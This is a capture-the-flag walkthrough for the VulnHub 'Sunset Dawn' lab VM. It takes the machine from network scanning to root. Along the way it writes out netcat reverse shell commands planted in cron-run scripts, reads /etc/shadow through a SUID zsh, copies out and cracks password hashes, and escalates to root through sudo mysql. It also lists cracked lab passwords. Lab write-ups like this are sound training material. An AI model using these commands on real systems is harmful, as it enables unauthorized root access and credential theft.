How to hack into Sunset Dawn from VulHub

https://www.vulnhub.com/entry/sunset-dawn,341/

System Info

Debian 10

Discover Target IP

sudo nmap -sn 192.168.122.1-255

Scan Ports

`nmap -p- 192.168.122.11
nmap -p 80,139,445,3306 -sC -sV 192.168.122.11
enum4linux -a 192.168.122.11

Port 80

robots.txt does not exist
using dirb http://192.168.122.11 we can find http://192.168.122.11/logs/
we can download management.log from it and take a look

SMB server

Port 139 and port 445 indicate that there is a smb server on the target machine
use smbclient -L //dawn to list all the service of it, and we can find shared disk ITDEPT
we can log into it by smbclient //dawn/ITDEPT
now we are in the smb share, but it is empty
if we go back to reading that management.log, we can find lines like

...
2022/11/08 13:29:02 [31;1mCMD: UID=0    PID=666    | /usr/sbin/CRON -f [0m
2022/11/08 13:29:02 [31;1mCMD: UID=0    PID=669    | chmod 777 /home/dawn/ITDEPT/web-control [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=671    | /usr/sbin/cron -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=670    | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=675    | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=674    | /usr/sbin/cron -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=673    | /usr/sbin/cron -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=672    | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=676    | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=677    | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=678    | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=682    | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=681    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control [0m
2022/11/08 13:30:01 [31;1mCMD: UID=1000 PID=680    | /bin/sh -c /home/dawn/ITDEPT/product-control [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0    PID=679    | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=33   PID=685    | /bin/sh -c /home/dawn/ITDEPT/web-control [0m
2022/11/08 13:30:01 [31;1mCMD: UID=???  PID=684    | ???[0m
...

which indicated that there are cron jobs running every few minutes, that change the permission of ~/ITDEPT/web-control and ~/ITDEPT/product-control to 777, and it will be run with bash as UID=33 and UID=1000 respectively, former is probably a daemon user like www-data and latter is a user on the target system.

Reverse shell

we can try to create our own web-control and product-control bash script, we can add nc -nv 192.168.122.101 9393 -e /bin/bash into them and for opening a reverse shell,
connect to the smb share and upload the file with put product-control
exit the share, opening a listening port on attacker’s machine ncat -nvlp 9393 and just wait

Exploring the system

now we have a reverse shell as user dawn, spawn a better shell with python3 -c 'import pty;pty.spawn("/bin/bash")'
If we search for all the files that belongs to root and have SUID bit set find / -user root -perm -4000 -type f 2>/dev/null we will find some binary files that we can run as normal users with root permission.

Privilege Esculation

just running zsh will give us root

/usr/bin/zsh

If we check out https://gtfobins.github.io/gtfobins/zsh/#file-read, there is a way for us to read restricted files using Zsh
export LFILE=/etc/shadow to set /etc/shadow file as environment variable LFILE
now we can read it using zsh -c 'echo "$(<$LFILE)"'
we can Standard Out it into a another file zsh -c 'echo "$(<$LFILE)"' > shadowfile
get it back to attacker’s machine by starting a http server or move it into the ~/ITDEPT/ SMB shared directory
we will also need to copy the /etc/passwd too

Cracking passwords

now we have both /etc/passwd and /etc/shadow files of the target system, we can try to crack it
but first we need to combine both files using unshadow passwd shadowfile > unshadowed
then we can crack it using John the Ripper john unshadowed --show

Rooting the system

now we can log in as ganimedes with password sunshine
check out their home directory, if we take a look at their .bash_history file, we can find a passphrase like thisisareallysecurepasswordnooneisgoingtoeverfind
if we try to use it on different users, we can login as root!

MySQL

run sudo -l we can see

...
User dawn may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/mysql

if we take a look at user dawn’s bash history file, we can find a line like this

...
echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
...

it seem a hashed password, if we use hashid or hash-identifier, we know that it is MD5 Crypt
we can try to crack it using John the Ripper with a bigger wordlist rockyou

john dawn.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt

and we can get dawn’s passwd onii-chan29.

now we can use MySQL to execute bash as root with dawn’s password

sudo mysql -u root -p -e '\! /bin/bash'

now we are root

Phobos

If we take a look at management.log again, we can find another cron job in there, which is under user ganimedes home directory, and it is executed by root (UID = 0)

...
2022/11/11 15:02:01 [31;1mCMD: UID=0    PID=1501   | /bin/sh -c /home/ganimedes/phobos [0m
...

and file phobos doesn’t exist right now, so we can create our own reverse shell script and it will connect us as root

echo "nc -nv 192.168.122.101 9123 -e /bin/bash" > phobos && chmod +x phobos

opening a listening port on attacker’s machine ncat -nvlp 9123
now we have a root shell

Capture The Flag

cat /root/flag.txt

System Info#

Discover Target IP#

Scan Ports#

Port 80#

SMB server#

Reverse shell#

Exploring the system#

Privilege Esculation#

/usr/bin/zsh#

Cracking passwords#

Rooting the system#

MySQL#

Phobos#

Capture The Flag#